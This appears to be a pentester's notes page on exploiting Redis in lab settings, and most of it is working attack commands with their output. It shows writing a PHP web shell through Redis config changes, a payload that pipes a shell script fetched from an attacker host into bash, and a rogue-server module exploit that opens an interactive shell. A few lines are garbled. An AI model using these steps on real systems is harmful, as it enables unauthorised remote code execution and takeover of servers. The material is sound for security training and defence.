Redis is a really dangerous service that we can use to load modules and other cool stuff while there are other open services around.
This guide has all we need to know.
This github will have the module.so that we need, just type "make".
If we know and the service has write access try to upload files to the directories that a webserver is running. /var/www/html is a common one.
So the key is to look around in places that we have file upload vulnerability and figure out paths.
/var/ftp/anon/<directory-name-if-applies> is usaully where the anonymous root folder is located at.
REDIS + LFI
With the Local File Inclusion you could possibly use it to locate the credentials for the redis service.
Possible Locations
Now with credentials we can authenticate using the following command.
redis -h <ip>
auth <password>
The next thing we should try to do is enumerate the places we can write to using the configuration file of redis as well. This will be done through local file inclusion.
/etc/systemd/system/redis.service
Once done it will give you a bunch of places where redis can write to, so now what we can do is invoke a php reverse shell or make the computer get our reverse shell.
─ redis-cli -h 192.168.135.166
192.168.135.166:6379> Auth Ready4Redis?
OK
192.168.135.166:6379> config set dir /opt/redis-files
OK
192.168.135.166:6379> config set dbfilename redis.php
OK
192.168.135.166:6379>
192.168.135.166:6379> set test "<?php system($_GET['cmd']); ?>"
OK
192.168.135.166:6379> save
We then navigate to it with the LFI and we should get the cmd parameter. The rest is up to you.
This other method will require us to curl a shell.sh file.
192.168.135.166:6379> config set dbfilename redisss.php
OK
192.168.135.166:6379> set test "<?php system('whoami'); ?>"
OK
192.168.135.166:6379> save
We will host a webserver on whatever port we want. With redis we will execute the following command and use local file inclusion to execute the php code.
config set dbfilename redisssss.php
OK
192.168.135.166:6379> set test "<?php system('curl http://192.168.49.135:22/shell.sh | bash'); ?>"
OK
192.168.135.166:6379> save
Use local file inclusion to navigate to the php file.
Redis 4.x / 5.x Exploitation
╭─ /home/kali/BG/redis-rce master ?1 ▓▒░────────────────────────────────────────────────░▒▓ ✔ 15s root@kali
╰─ python3 redis-rce.py -r 192.168.242.176 -p 6379 -L 192.168.49.242 -P 6379 -f /home/kali/BG/redis-rce/redis-rogue-server/RedisModulesSDK/exp/exp.so
█▄▄▄▄ ▄███▄ ██▄ ▄█ ▄▄▄▄▄ █▄▄▄▄ ▄█▄ ▄███▄
█ ▄▀ █▀ ▀ █ █ ██ █ ▀▄ █ ▄▀ █▀ ▀▄ █▀ ▀
█▀▀▌ ██▄▄ █ █ ██ ▄ ▀▀▀▀▄ █▀▀▌ █ ▀ ██▄▄
█ █ █▄ ▄▀ █ █ ▐█ ▀▄▄▄▄▀ █ █ █▄ ▄▀ █▄ ▄▀
█ ▀███▀ ███▀ ▐ █ ▀███▀ ▀███▀
▀ ▀
[*] Connecting to 192.168.242.176:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.242.176:6379
[*] Setting filename
[+] Accepted connection from 192.168.242.176:6379
[*] Start listening on 192.168.49.242:6379
[*] Tring to run payload
[+] Accepted connection from 192.168.242.176:46704
[*] Closing rogue server...
[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ ls
$ whoami
exp_lin.so
exp.so
snap.lxd
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-logind.service-D0hrMh
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-resolved.service-kR64tg
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-timesyncd.service-i0lI9g
vmware-root_708-2998936538
$ nc
Aprudence
Use the exact same path as that In order to order for it to work. Then upgrade your shell using socat.
